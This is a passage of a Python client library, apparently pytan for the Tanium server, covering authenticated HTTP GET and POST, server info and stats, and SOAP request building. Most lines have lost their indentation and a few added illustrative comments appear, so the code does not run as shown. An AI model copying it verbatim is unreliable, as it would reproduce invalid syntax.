obj : :class:`taniumpy.object_types.result_info.ResultInfo`
* ResultInfo for `obj`
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_info_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
        # parse the ResultXML node into its own element
resultxml_text = self._extract_resultxml(response_body=response_body)
cdata_el = ET.fromstring(resultxml_text)
obj = taniumpy.ResultInfo.fromSOAPElement(cdata_el)
obj._RAW_XML = resultxml_text
return obj
def get_result_data(self, obj, **kwargs):
"""Create and send a GetResultData XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to get result set for
Returns
-------
obj : :class:`taniumpy.object_types.result_set.ResultSet`
* otherwise, `obj` will be the ResultSet for `obj`
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_data_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
        # parse the ResultXML node into its own element
resultxml_text = self._extract_resultxml(response_body=response_body)
cdata_el = ET.fromstring(resultxml_text)
obj = taniumpy.ResultSet.fromSOAPElement(cdata_el)
obj._RAW_XML = resultxml_text
return obj
def get_result_data_sse(self, obj, **kwargs):
"""Create and send a GetResultData XML Request body that starts a server side export from `obj` and parses the response for an export_id.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to start server side export
Returns
-------
export_id : str
* value of export_id element found in response
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_result_data_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
# if there is an export_id node, return the contents of that
export_id = self._regex_body_for_element(
body=response_body, element='export_id', fail=True,
)
return export_id
def get_server_info(self, port=None, fallback_port=444, **kwargs):
"""Get the /info.json.
Parameters
----------
port : int, optional
* default: None
* port to attempt getting /info.json from, if not specified will use self.port
fallback_port : int, optional
* default: 444
* fallback port to attempt getting /info.json from if `port` fails
Returns
-------
info_dict : dict
* raw json response converted into python dict
* 'diags_flat': info.json flattened out into an easier to use structure for python handling
* 'server_info_pass_msgs': messages about successfully retrieving info.json
* 'server_info_fail_msgs': messages about failing to retrieve info.json
See Also
--------
:func:`pytan.sessions.Session._flatten_server_info` : method to flatten the dictionary received from info.json into a python friendly format
Notes
-----
* 6.2 /info.json is only available on soap port (default port: 444)
* 6.5 /info.json is only available on server port (default port: 443)
"""
self._check_auth()
url = self.INFO_RES
if port is None:
port = self.port
req_args = {}
req_args['port'] = port
req_args['url'] = url
req_args['retry_count'] = 0
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.INFO_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.INFO_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
info_body = ''
server_info_pass_msgs = []
server_info_fail_msgs = []
ok_m = "Successfully retrieved server info from {}:{}/{}".format
bad_m = "Failed to retrieve server info from {}:{}/{}, {}".format
json_fail_m = "Failed to parse server info from json, error: {}".format
diags_flat_fail_m = "Failed to flatten server info from json, error: {}".format
try:
info_body = self.http_get(**req_args)
server_info_pass_msgs.append(ok_m(self.host, port, self.INFO_RES))
except Exception as e:
self.mylog.debug(bad_m(self.host, port, self.INFO_RES, e))
server_info_fail_msgs.append(bad_m(self.host, port, self.INFO_RES, e))
if not info_body:
req_args['port'] = fallback_port
try:
                info_body = self.http_get(**req_args)
                server_info_pass_msgs.append(ok_m(self.host, fallback_port, self.INFO_RES))
            except Exception as e:
                self.mylog.debug(bad_m(self.host, fallback_port, self.INFO_RES, e))
                server_info_fail_msgs.append(bad_m(self.host, fallback_port, self.INFO_RES, e))
try:
info_dict = json.loads(info_body)
except Exception as e:
info_dict = {'info_body_failed_json': info_body}
server_info_fail_msgs.append(json_fail_m(e))
try:
diagnostics = info_dict.get('Diagnostics', [])
info_dict['diags_flat'] = self._flatten_server_info(structure=diagnostics)
except Exception as e:
info_dict['diags_flat'] = {}
server_info_fail_msgs.append(diags_flat_fail_m(e))
info_dict['server_info_pass_msgs'] = server_info_pass_msgs
info_dict['server_info_fail_msgs'] = server_info_fail_msgs
return info_dict
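    # Illustrative usage (sketch only, assumes an authenticated session):
    #   info = session.get_server_info()
    #   version = info['diags_flat'].get('Settings', {}).get('Version')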
def get_server_version(self, **kwargs):
"""Try to parse the server version from /info.json.
Returns
-------
str
* str containing server version from /info.json
"""
if not self._invalid_server_version():
return self.server_version
h = "Get the server version via /info.json"
pytan_help = kwargs.get('pytan_help', h)
kwargs['pytan_help'] = pytan_help
server_version = "Unable to determine"
if not getattr(self, 'server_info', {}):
self.server_info = self.get_server_info(**kwargs)
if not getattr(self, 'server_info', {}):
return server_version
version = None
try:
version = self.server_info['diags_flat']['Settings']['Version']
except Exception:
m = "Unable to find Version key in Settings: {}".format
self.mylog.debug(m(self.server_info['diags_flat']))
if version:
server_version = version
else:
m = "Unable to find Version key in Settings: {}".format
self.mylog.debug(m(self.server_info['diags_flat']))
if server_version:
self.server_version = str(server_version)
return server_version
def get_server_stats(self, **kwargs):
"""Create a str containing a number of stats gathered from /info.json.
Returns
-------
str
* str containing stats from /info.json
See Also
--------
:data:`pytan.sessions.Session.STATS_LOOP_TARGETS` : list of dict containing stat keys to pull from /info.json
"""
try:
self._check_auth()
except Exception:
return "Not yet authenticated!"
si = self.get_server_info(**kwargs)
        try:
            diags = si['diags_flat']
        except Exception:
            diags = {}
stats_resolved = [
self._find_stat_target(target=t, diags=diags) for t in self.STATS_LOOP_TARGETS
]
stats_text = ", ".join(["{}: {}".format(*list(i.items())[0]) for i in stats_resolved])
return stats_text
def enable_stats_loop(self, sleep=None):
"""Enable the stats loop thread, which will print out the results of :func:`pytan.sessions.Session.get_server_stats` every :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC`.
Parameters
----------
sleep : int, optional
* when enabling the stats loop, update :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC` with `sleep`
See Also
--------
:func:`pytan.sessions.Session._stats_loop` : method started as a thread which checks self.STATS_LOOP_ENABLED before running :func:`pytan.sessions.Session.get_server_stats`
"""
self.STATS_LOOP_ENABLED = True
if isinstance(sleep, int):
self.STATS_LOOP_SLEEP_SEC = sleep
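    # Illustrative usage (sketch only): stats are only printed by the background loop once it
    # is enabled, e.g. session.enable_stats_loop(sleep=10)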
def disable_stats_loop(self, sleep=None):
"""Disable the stats loop thread, which will print out the results of :func:`pytan.sessions.Session.get_server_stats` every :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC`.
Parameters
----------
sleep : int, optional
* when disabling the stats loop, update :data:`pytan.sessions.Session.STATS_LOOP_SLEEP_SEC` with `sleep`
See Also
--------
:func:`pytan.sessions.Session._stats_loop` : method started as a thread which checks self.STATS_LOOP_ENABLED before running :func:`pytan.sessions.Session.get_server_stats`
"""
self.STATS_LOOP_ENABLED = False
if isinstance(sleep, int):
self.STATS_LOOP_SLEEP_SEC = sleep
def http_get(self, url, **kwargs):
"""An authenticated HTTP GET method. It will always forcibly use the authentication credentials that are stored in the current object when performing an HTTP GET.
Parameters
----------
url : str
* url to fetch on the server
host : str, optional
* default: self.host
* host to connect to
port : int, optional
* default: self.port
* port to connect to
headers : dict, optional
* default: {}
* headers to supply as part of GET request
connect_timeout : int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout : int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
debug : bool, optional
* default: self.HTTP_DEBUG
* False: do not print requests debug messages
* True: print requests debug messages
auth_retry : bool, optional
* default: self.HTTP_AUTH_RETRY
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count : int, optional
* default: self.HTTP_RETRY_COUNT
* number of times to retry the GET request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session._http_get` : private method used to perform the actual HTTP GET
"""
self._check_auth()
headers = kwargs.get('headers', {})
headers = self._replace_auth(headers=headers)
req_args = {}
req_args['host'] = kwargs.get('server', self.host)
req_args['port'] = kwargs.get('port', self.port)
req_args['url'] = url
req_args['headers'] = headers
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['debug'] = kwargs.get('debug', self.HTTP_DEBUG)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
auth_retry = kwargs.get('auth_retry', self.HTTP_AUTH_RETRY)
retry_count = kwargs.get('retry_count', self.HTTP_RETRY_COUNT)
if not retry_count or type(retry_count) != int:
retry_count = 0
current_try = 1
while True:
try:
body = self._http_get(**req_args)
break
except pytan.exceptions.AuthorizationError:
if self._session_id and auth_retry:
self._session_id = ''
self.authenticate(**kwargs)
body = self.http_get(auth_retry=False, **kwargs)
else:
raise
except Exception as e:
if retry_count == 0:
raise
m = "http_get failed on attempt {} out of {}: {}".format
self.mylog.debug(m(current_try, retry_count, e))
if current_try == retry_count:
self.mylog.warning(m(current_try, retry_count, e))
raise
current_try += 1
return body
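    # Illustrative usage (sketch only, assumes an authenticated session):
    #   body = session.http_get('info.json')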
def http_post(self, **kwargs):
"""An authenticated HTTP POST method. It will always forcibly use the authentication credentials that are stored in the current object when performing an HTTP POST.
Parameters
----------
url : str, optional
* default: self.SOAP_RES
* url to fetch on the server
host : str, optional
* default: self.host
* host to connect to
port : int, optional
* default: self.port
* port to connect to
headers : dict, optional
* default: {}
* headers to supply as part of POST request
body : str, optional
* default: ''
* body to send as part of the POST request
connect_timeout : int, optional
* default: self.SOAP_CONNECT_TIMEOUT_SEC
* timeout in seconds for connection to host
response_timeout : int, optional
* default: self.SOAP_RESPONSE_TIMEOUT_SEC
* timeout in seconds for response from host
debug : bool, optional
* default: self.HTTP_DEBUG
* False: do not print requests debug messages
* True: print requests debug messages
auth_retry : bool, optional
* default: self.HTTP_AUTH_RETRY
* True: retry authentication with username/password if session_id fails
* False: throw exception if session_id fails
retry_count : int, optional
* default: self.HTTP_RETRY_COUNT
* number of times to retry the POST request if the server fails to respond properly or in time
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.sessions.Session._http_post` : private method used to perform the actual HTTP POST
"""
self._check_auth()
headers = kwargs.get('headers', {})
headers = self._replace_auth(headers=headers)
req_args = {}
req_args['host'] = kwargs.get('server', self.host)
req_args['port'] = kwargs.get('port', self.port)
req_args['url'] = kwargs.get('url', self.SOAP_RES)
req_args['headers'] = headers
req_args['body'] = kwargs.get('body', None)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.SOAP_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.SOAP_RESPONSE_TIMEOUT_SEC
)
req_args['debug'] = kwargs.get('debug', self.HTTP_DEBUG)
req_args['pytan_help'] = kwargs.get('pytan_help', '')
auth_retry = kwargs.get('auth_retry', self.HTTP_AUTH_RETRY)
retry_count = kwargs.get('retry_count', self.HTTP_RETRY_COUNT)
if not retry_count or type(retry_count) != int:
retry_count = 0
current_try = 1
while True:
try:
body = self._http_post(**req_args)
break
except pytan.exceptions.AuthorizationError:
if self._session_id and auth_retry:
self._session_id = ''
self.authenticate()
body = self.http_post(auth_retry=False, **kwargs)
else:
raise
except Exception as e:
if retry_count == 0:
raise
m = "http_post failed on attempt {} out of {}: {}".format
self.mylog.debug(m(current_try, retry_count, e))
if current_try == retry_count:
self.mylog.warning(m(current_try, retry_count, e))
raise
current_try += 1
return body
def _http_get(self, host, port, url, headers=None, connect_timeout=15,
response_timeout=180, debug=False, pytan_help='', **kwargs):
"""An HTTP GET method that utilizes the :mod:`requests` package.
Parameters
----------
host : str
* host to connect to
port : int
* port to connect to
url : str
* url to fetch on the server
headers : dict, optional
* default: None
* headers to supply as part of POST request
connect_timeout : int, optional
* default: 15
* timeout in seconds for connection to host
response_timeout : int, optional
* default: 180
* timeout in seconds for response from host
debug : bool, optional
* default: False
* False: do not print requests debug messages
* True: print requests debug messages
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
perform_xml_clean : bool, optional
* default: False
* False: Do not run the response_body through an XML cleaner
* True: Run the response_body through an XML cleaner before returning it
clean_restricted : bool, optional
* default: True
* True: When XML cleaning the response_body, remove restricted characters as well as invalid characters
* False: When XML cleaning the response_body, remove only invalid characters
log_clean_messages : bool, optional
* default: True
* True: When XML cleaning the response_body, enable logging messages about invalid/restricted matches
* False: When XML cleaning the response_body, disable logging messages about invalid/restricted matches
log_bad_characters : bool, optional
* default: False
* False: When XML cleaning the response_body, disable logging messages about the actual characters that were invalid/restricted
* True: When XML cleaning the response_body, enable logging messages about the actual characters that were invalid/restricted
Returns
-------
body : str
* str containing body of response from server
"""
full_url = self._full_url(host=host, port=port, url=url)
cleaned_headers = self._clean_headers(headers=headers)
self.httplog.debug("HTTP request: GET to {}".format(full_url))
self.httplog.debug("HTTP request: headers: {}".format(cleaned_headers))
req_args = {}
req_args['headers'] = headers
req_args['timeout'] = (connect_timeout, response_timeout)
try:
response = self.REQUESTS_SESSION.get(full_url, **req_args)
response.pytan_help = pytan_help
except Exception as e:
m = "HTTP response: GET request to {!r} failed: {}".format
raise pytan.exceptions.HttpError(m(full_url, e))
self.LAST_REQUESTS_RESPONSE = response
if self.RECORD_ALL_REQUESTS:
self.ALL_REQUESTS_RESPONSES.append(response)
response_body = response.text
response_headers = response.headers
perform_xml_clean = kwargs.get('perform_xml_clean', False)
if perform_xml_clean:
xml_clean_args = {}
xml_clean_args['s'] = response_body
xml_clean_args['clean_restricted'] = kwargs.get('clean_restricted', True)
xml_clean_args['log_clean_messages'] = kwargs.get('log_clean_messages', True)
xml_clean_args['log_bad_characters'] = kwargs.get('log_bad_characters', False)
response_body = xml_cleaner(**xml_clean_args)
m = "HTTP response: from {!r} len:{}, status:{} {}, body type: {}".format
self.httplog.debug(m(
full_url,
len(response_body),
response.status_code,
response.reason,
type(response_body),
))
self.httplog.debug("HTTP response: headers: {}".format(response_headers))
if response.status_code in self.AUTH_FAIL_CODES:
m = "HTTP response: GET request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.AuthorizationError(m(
full_url, response.status_code, response_body))
if not response.ok:
m = "HTTP response: GET request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.HttpError(m(full_url, response.status_code, response_body))
self.bodyhttplog.debug("HTTP response: body:\n{}".format(response_body))
return response_body
def _http_post(self, host, port, url, body=None, headers=None, connect_timeout=15,
response_timeout=180, debug=False, pytan_help='', **kwargs):
"""An HTTP POST method that utilizes the :mod:`requests` package.
Parameters
----------
host : str
* host to connect to
port : int
* port to connect to
url : str
* url to fetch on the server
body : str, optional
* default: None
* body to send as part of the POST request
headers : dict, optional
* default: None
* headers to supply as part of POST request
connect_timeout : int, optional
* default: 15
* timeout in seconds for connection to host
response_timeout : int, optional
* default: 180
* timeout in seconds for response from host
debug : bool, optional
* default: False
* False: do not print requests debug messages
* True: print requests debug messages
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
perform_xml_clean : bool, optional
* default: True
* True: Run the response_body through an XML cleaner before returning it
* False: Do not run the response_body through an XML cleaner
clean_restricted : bool, optional
* default: True
* True: When XML cleaning the response_body, remove restricted characters as well as invalid characters
* False: When XML cleaning the response_body, remove only invalid characters
log_clean_messages : bool, optional
* default: True
* True: When XML cleaning the response_body, enable logging messages about invalid/restricted matches
* False: When XML cleaning the response_body, disable logging messages about invalid/restricted matches
log_bad_characters : bool, optional
* default: False
* False: When XML cleaning the response_body, disable logging messages about the actual characters that were invalid/restricted
* True: When XML cleaning the response_body, enable logging messages about the actual characters that were invalid/restricted
Returns
-------
body : str
* str containing body of response from server
See Also
--------
:func:`pytan.xml_clean.xml_cleaner` : function to remove invalid/bad characters from XML responses
"""
full_url = self._full_url(host=host, port=port, url=url)
cleaned_headers = self._clean_headers(headers=headers)
self.httplog.debug("HTTP request: POST to {}".format(full_url))
self.httplog.debug("HTTP request: headers: {}".format(cleaned_headers))
if not body:
print_body = ''
else:
print_body = '\n{}'.format(body)
self.bodyhttplog.debug("HTTP request: body:{}".format(print_body))
req_args = {}
req_args['headers'] = headers
req_args['data'] = body
req_args['timeout'] = (connect_timeout, response_timeout)
try:
response = self.REQUESTS_SESSION.post(full_url, **req_args)
response.pytan_help = pytan_help
except Exception as e:
m = "HTTP response: POST request to {!r} failed: {}".format
raise pytan.exceptions.HttpError(m(full_url, e))
self.LAST_REQUESTS_RESPONSE = response
if self.RECORD_ALL_REQUESTS:
self.ALL_REQUESTS_RESPONSES.append(response)
response_body = response.text
response_headers = response.headers
perform_xml_clean = kwargs.get('perform_xml_clean', True)
if perform_xml_clean:
xml_clean_args = {}
xml_clean_args['s'] = response_body
xml_clean_args['clean_restricted'] = kwargs.get('clean_restricted', True)
xml_clean_args['log_clean_messages'] = kwargs.get('log_clean_messages', True)
xml_clean_args['log_bad_characters'] = kwargs.get('log_bad_characters', False)
response_body = xml_cleaner(**xml_clean_args)
m = "HTTP response: from {!r} len:{}, status:{} {}, body type: {}".format
self.httplog.debug(m(
full_url,
len(response_body),
response.status_code,
response.reason,
type(response_body),
))
self.httplog.debug("HTTP response: headers: {}".format(response_headers))
if response.status_code in self.AUTH_FAIL_CODES:
m = "HTTP response: POST request to {!r} returned code: {}, body: {}".format
m = m(full_url, response.status_code, response_body)
raise pytan.exceptions.AuthorizationError(m)
if not response_body:
m = "HTTP response: POST request to {!r} returned empty body".format
raise pytan.exceptions.HttpError(m(full_url))
if not response.ok:
m = "HTTP response: POST request to {!r} returned code: {}, body: {}".format
raise pytan.exceptions.HttpError(m(full_url, response.status_code, response_body))
self.bodyhttplog.debug("HTTP response: body:\n{}".format(response_body))
return response_body
def _replace_auth(self, headers):
"""Utility method for removing username, password, and/or session from supplied headers and replacing them with the current objects session or username and password.
Parameters
----------
headers : dict
* dict of key/value pairs for a set of headers for a given request
Returns
-------
headers : dict
* dict of key/value pairs for a set of headers for a given request
"""
for k in dict(headers):
if k in ['username', 'password', 'session']:
self.authlog.debug("Removing header {!r}".format(k))
headers.pop(k)
if self._session_id:
headers['session'] = self._session_id
self.authlog.debug("Using session ID for authentication headers")
elif self._username and self._password:
headers['username'] = b64encode(self._username.encode("utf-8"))
headers['password'] = b64encode(self._password.encode("utf-8"))
self.authlog.debug("Using Username/Password for authentication headers")
return headers
def _full_url(self, url, **kwargs):
"""Utility method for constructing a full url.
Parameters
----------
url : str
* url to use in string
host : str, optional
* default: self.host
* hostname/IP address to use in string
port : str, optional
* default: self.port
* port to use in string
Returns
-------
full_url : str
* full url in the form of https://$host:$port/$url
"""
host = kwargs.get('host', self.host)
port = kwargs.get('port', self.port)
full_url = "https://{0}:{1}/{2}".format(host, port, url)
return full_url
def _clean_headers(self, headers=None):
"""Utility method for getting the headers for the current request, combining them with the session headers used for every request, and obfuscating the value of any 'password' header.
Parameters
----------
headers : dict
* dict of key/value pairs for a set of headers for a given request
Returns
-------
headers : dict
* dict of key/value pairs for a set of cleaned headers for a given request
"""
clean_headers = dict(headers or {})
return_headers = {}
return_headers.update(self.REQUESTS_SESSION.headers)
return_headers.update(clean_headers)
if 'password' in return_headers:
return_headers['password'] = '**PASSWORD**'
return return_headers
def _start_stats_thread(self, **kwargs):
"""Utility method starting the :func:`pytan.sessions.Session._stats_loop` method in a threaded daemon."""
stats_thread = threading.Thread(target=self._stats_loop, args=(), kwargs=kwargs)
stats_thread.daemon = True
stats_thread.start()
def platform_is_6_5(self, **kwargs):
"""Check to see if self.server_version is less than 6.5.
Changed in 2.2.0 to assume platform IS 6.5 or greater.
Returns
-------
ret : bool
* True if self.force_server_version is greater than or equal to 6.5
* True if self.server_version is greater than or equal to 6.5
* False if self.server_version is less than 6.5
"""
ret = True
        if self.force_server_version:
            if self.force_server_version < '6.5':
                ret = False
        else:
            if self._invalid_server_version():
                # server version is not valid, force a refresh right now
                self.get_server_version(**kwargs)
            if not self._invalid_server_version():
                if self.server_version < '6.5':
                    ret = False
return ret
def _stats_loop(self, **kwargs):
"""Utility method for logging server stats via :func:`pytan.sessions.Session.get_server_stats` every self.STATS_LOOP_SLEEP_SEC."""
while True:
if self.STATS_LOOP_ENABLED:
server_stats = self.get_server_stats(**kwargs)
self.statslog.warning(server_stats)
time.sleep(self.STATS_LOOP_SLEEP_SEC)
def _flatten_server_info(self, structure):
"""Utility method for flattening the JSON structure for info.json into a more python usable format.
Parameters
----------
structure
* dict/tuple/list to flatten
Returns
-------
flattened
* the dict/tuple/list flattened out
"""
flattened = structure
if isinstance(structure, dict):
for k, v in flattened.items():
flattened[k] = self._flatten_server_info(structure=v)
elif isinstance(structure, (tuple, list)):
if all([isinstance(x, dict) for x in structure]):
flattened = {}
[flattened.update(self._flatten_server_info(structure=i)) for i in structure]
return flattened
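    # Illustrative transformation performed here (sketch only, placeholder values):
    #   [{'Settings': [{'Version': '<version>'}]}, {'String Cache': [{'Total String Count': '42'}]}]
    # becomes:
    #   {'Settings': {'Version': '<version>'}, 'String Cache': {'Total String Count': '42'}}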
def _get_percentage(self, part, whole):
"""Utility method for getting percentage of part out of whole.
Parameters
----------
part: int, float
whole: int, float
Returns
-------
str : the percentage of part out of whole in 2 decimal places
"""
f = 100 * float(part) / float(whole)
return "{0:.2f}%".format(f)
def _find_stat_target(self, target, diags):
"""Utility method for finding a target in info.json and returning the value, optionally performing a percentage calculation on two values if the target[0] starts with percentage(.
Parameters
----------
        target : dict
        * single item dict whose key is a human friendly label and whose value is a / separated search path used to find a given value from info.json
diags : dict
* flattened dictionary of info.json diagnostics
Returns
-------
dict
* label : same as provided in `target` index0 (label)
* result : value resolved from :func:`pytan.sessions.Session._resolve_stat_target` for `target` index1 (search_path)
"""
try:
label, search_path = list(target.items())[0]
except Exception as e:
label = "Parse Failure"
result = "Unable to parse stat target: {}, exception: {}".format(target, e)
return {label: result}
        if search_path.startswith('percentage('):
            # strip the literal 'percentage(' prefix and the trailing ')' without touching the inner search paths
            points = search_path[len('percentage('):].rstrip(')')
points = [
self._resolve_stat_target(search_path=p, diags=diags) for p in points.split(',')
]
try:
result = self._get_percentage(part=points[0], whole=points[1])
except Exception:
result = ', '.join(points)
else:
result = self._resolve_stat_target(search_path=search_path, diags=diags)
return {label: result}
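    # Illustrative call (sketch only), using the 'Memory Available' entry from
    # STATS_LOOP_TARGETS; the resolved percentage depends on the server:
    #   self._find_stat_target(target=self.STATS_LOOP_TARGETS[-1], diags=flat_info)
    #   -> {'Memory Available': '48.21%'}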
def _resolve_stat_target(self, search_path, diags):
"""Utility method for resolving the value of search_path in info.json and returning the value.
Parameters
----------
search_path : str
        * / separated search path to find a given value from info.json
diags : dict
* flattened dictionary of info.json diagnostics
Returns
-------
str
* value resolved from `diags` for `search_path`
"""
try:
for i in search_path.split('/'):
diags = diags.get(i)
except Exception as e:
return "Unable to find diagnostic: {}, exception: {}".format(search_path, e)
return diags
def _build_body(self, command, object_list, log_options=False, **kwargs):
"""Utility method for building an XML Request Body.
Parameters
----------
command : str
* text to use in command node when building template
object_list : str
* XML string to use in object list node when building template
kwargs : dict, optional
        * any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
log_options : bool, optional
* default: False
* False: Do not print messages setting attributes in Options from keys in kwargs
* True: Print messages setting attributes in Options from keys in kwargs
Returns
-------
body : str
        * The XML request body created from the string.Template self.REQUEST_BODY_BASE
"""
options_obj = taniumpy.Options()
for k, v in kwargs.items():
if hasattr(options_obj, k):
if log_options:
m = "Setting Options attribute {!r} to value {!r}".format
self.mylog.debug(m(k, v))
setattr(options_obj, k, v)
else:
if log_options:
m = "Ignoring argument {!r} for options list, not a valid attribute".format
self.mylog.debug(m(k))
options = options_obj.toSOAPBody(minimal=True)
body_template = string.Template(self.REQUEST_BODY_BASE)
body = body_template.substitute(command=command, object_list=object_list, options=options)
return body
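# Illustrative sketch (not from the original source) of how the method above is
# typically driven, assuming self.REQUEST_BODY_BASE is a string.Template with
# $command, $object_list and $options placeholders; the kwarg name shown is a
# hypothetical Options attribute:
#   body = self._build_body(
#       command='GetObject',
#       object_list='<sensor><name>Computer Name</name></sensor>',
#       row_count=10,  # hypothetical Options attribute; ignored if not a valid attribute
#   )
#   # -> SOAP request body with command, object list and serialized Options filled in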
def _create_run_plugin_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to run a plugin.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'RunPlugin'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_add_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to add an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'AddObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_delete_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to delete an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'DeleteObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_result_info_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get result info for an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'GetResultInfo'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_result_data_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get result data for an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'GetResultData'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_get_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to get an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
if isinstance(obj, taniumpy.BaseType):
object_list = obj.toSOAPBody(minimal=True)
else:
object_list = '<{}/>'.format(obj._soap_tag)
cmd = 'GetObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _create_update_object_body(self, obj, **kwargs):
"""Utility method for building an XML Request Body to update an object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to convert into XML
kwargs : dict, optional
* any number of attributes that can be set via :class:`taniumpy.object_types.options.Options` that control the server's response.
Returns
-------
obj_body : str
* The XML request body created from :func:`pytan.sessions.Session._build_body`
"""
clean_keys = ['command', 'object_list']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
object_list = obj.toSOAPBody(minimal=True)
cmd = 'UpdateObject'
obj_body = self._build_body(command=cmd, object_list=object_list, **clean_kwargs)
return obj_body
def _check_auth(self):
"""Utility method to check if authentication has been done yet, and throw an exception if not."""
if not self.is_auth:
class_name = self.__class__.__name__
err = "Not yet authenticated, use {}.authenticate()!".format
raise pytan.exceptions.AuthorizationError(err(class_name))
def _regex_body_for_element(self, body, element, fail=True):
"""Utility method to use a regex to get an element from an XML body.
Parameters
----------
